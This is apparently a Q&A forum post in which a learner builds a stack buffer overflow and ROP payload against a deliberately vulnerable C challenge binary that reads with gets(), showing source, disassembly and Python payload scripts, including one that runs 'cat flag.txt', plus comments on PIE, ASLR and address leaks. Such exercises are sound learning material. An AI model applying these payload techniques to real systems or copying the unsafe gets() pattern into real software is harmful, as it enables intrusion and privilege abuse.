# Rop Buffer Overflow

Tags: security, buffer-overflow

I am trying to get a shell by overflowing the stack, but no matter what I do it doesn't work. ASLR is On, but stack cookies are off and I can't execute code on the stack. here is the code:

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void secret() {
    system("bash");
}

void start() {
    char user[32];

    puts("User : ");
    gets(user);

    write(1, "Hello ", 6);
    write(1, user, strlen(user));
    puts("!");
}

void main() {
    if (seteuid(1001) == -1 || setuid(1001) == -1 || setegid(1001) == -1 || setgid(1001) == -1) {
        printf("Error for 'setuid'\n");
    }

    setvbuf(stdout, NULL, _IONBF, 0x500);
    start();
}
```

As soon as the stack is overlfowed, execve called in system.c, return a zombie shell. Even tought i call secret in real code.

here is my python silly script

```
buf = ""
buf += "A"*32

# RBP
buf += struct.pack("<Q", 0x7fffffffe1c0)

#secret call
buf += struct.pack("<Q", 0x000055555555491a)

f = open("payload", "w")
f.write(buf)
```

and here is the dasm of the exec

```
000000000000091a <secret>:
 91a:   55                      push   %rbp
 91b:   48 89 e5                mov    %rsp,%rbp
 91e:   48 8d 3d 6f 01 00 00    lea    0x16f(%rip),%rdi        # a94 <_IO_stdin_used+0x4>
 925:   e8 66 fe ff ff          callq  790 <system@plt>
 92a:   90                      nop
 92b:   5d                      pop    %rbp
 92c:   c3                      retq   

000000000000092d <start>:
 92d:   55                      push   %rbp
 92e:   48 89 e5                mov    %rsp,%rbp
 931:   48 83 ec 20             sub    $0x20,%rsp
 935:   48 8d 3d 5d 01 00 00    lea    0x15d(%rip),%rdi        # a99 <_IO_stdin_used+0x9>
 93c:   e8 1f fe ff ff          callq  760 <puts@plt>
 941:   48 8d 45 e0             lea    -0x20(%rbp),%rax
 945:   48 89 c7                mov    %rax,%rdi
 948:   b8 00 00 00 00          mov    $0x0,%eax
 94d:   e8 4e fe ff ff          callq  7a0 <gets@plt>
 952:   ba 06 00 00 00          mov    $0x6,%edx
 957:   48 8d 35 43 01 00 00    lea    0x143(%rip),%rsi        # aa1 <_IO_stdin_used+0x11>
 95e:   bf 01 00 00 00          mov    $0x1,%edi
 963:   e8 08 fe ff ff          callq  770 <write@plt>
 968:   48 8d 45 e0             lea    -0x20(%rbp),%rax
 96c:   48 89 c7                mov    %rax,%rdi
 96f:   e8 0c fe ff ff          callq  780 <strlen@plt>
 974:   48 89 c2                mov    %rax,%rdx
 977:   48 8d 45 e0             lea    -0x20(%rbp),%rax
 97b:   48 89 c6                mov    %rax,%rsi
 97e:   bf 01 00 00 00          mov    $0x1,%edi
 983:   e8 e8 fd ff ff          callq  770 <write@plt>
 988:   48 8d 3d 19 01 00 00    lea    0x119(%rip),%rdi        # aa8 <_IO_stdin_used+0x18>
 98f:   e8 cc fd ff ff          callq  760 <puts@plt>
 994:   90                      nop
 995:   c9                      leaveq 
 996:   c3                      retq   

0000000000000997 <main>:
 997:   55                      push   %rbp
 998:   48 89 e5                mov    %rsp,%rbp
 99b:   bf e9 03 00 00          mov    $0x3e9,%edi
 9a0:   e8 4b fe ff ff          callq  7f0 <seteuid@plt>
 9a5:   83 f8 ff                cmp    $0xffffffff,%eax
 9a8:   74 2d                   je     9d7 <main+0x40>
 9aa:   bf e9 03 00 00          mov    $0x3e9,%edi
 9af:   e8 1c fe ff ff          callq  7d0 <setuid@plt>
 9b4:   83 f8 ff                cmp    $0xffffffff,%eax
 9b7:   74 1e                   je     9d7 <main+0x40>
 9b9:   bf e9 03 00 00          mov    $0x3e9,%edi
 9be:   e8 1d fe ff ff          callq  7e0 <setegid@plt>
 9c3:   83 f8 ff                cmp    $0xffffffff,%eax
 9c6:   74 0f                   je     9d7 <main+0x40>
 9c8:   bf e9 03 00 00          mov    $0x3e9,%edi
 9cd:   e8 ee fd ff ff          callq  7c0 <setgid@plt>
 9d2:   83 f8 ff                cmp    $0xffffffff,%eax
 9d5:   75 0c                   jne    9e3 <main+0x4c>
 9d7:   48 8d 3d cc 00 00 00    lea    0xcc(%rip),%rdi        # aaa <_IO_stdin_used+0x1a>
 9de:   e8 7d fd ff ff          callq  760 <puts@plt>
 9e3:   48 8b 05 8e 06 20 00    mov    0x20068e(%rip),%rax        # 201078 <stdout@@GLIBC_2.2.5>
 9ea:   b9 00 05 00 00          mov    $0x500,%ecx
 9ef:   ba 02 00 00 00          mov    $0x2,%edx
 9f4:   be 00 00 00 00          mov    $0x0,%esi
 9f9:   48 89 c7                mov    %rax,%rdi
 9fc:   e8 af fd ff ff          callq  7b0 <setvbuf@plt>
 a01:   b8 00 00 00 00          mov    $0x0,%eax
 a06:   e8 22 ff ff ff          callq  92d <start>
 a0b:   90                      nop
 a0c:   5d                      pop    %rbp
 a0d:   c3                      retq   
 a0e:   66 90                   xchg   %ax,%ax
```

please help

Edit
I managed to cat a file by doing..
import struct

```
buf = "A"*32

# RBP
buf += struct.pack("<Q", 0x7fffffffe1c0)

#POP RDI
buf += struct.pack("<Q", 0x0000000000000a73+0x555555554000)
buf += struct.pack("<Q", 0x7fffffffe1d0)

# call secret
buf += struct.pack("<Q", 0x0000555555554925)

buf += "cat flag.txt\x00"
```

Does this means i would have to take a register with close address to 0x7fffffffe1d0 and add a constant when aslr is on using a gadget?

Comment: `pie` is on, so the address of `secret()` or whatever gadgets is not always `0x0000555555554???`, you have to leak it first.

Comment: In the last example, I disabled ASLR so I can POP the stack. But you are right, stack is not always at the same loc.. As for secret, it seems to be always at the same location even when ASLR is on. I red somewhere that .text area of my own code will always be at same location at least on linux. Only librairy, stack and heap change location. How can I leak stack address ? The only way I see it is to have 2 gets() and printf or write and read back an offset from a python script. I guess what I am trying to test next is to brute force stack address using random generator in a python script.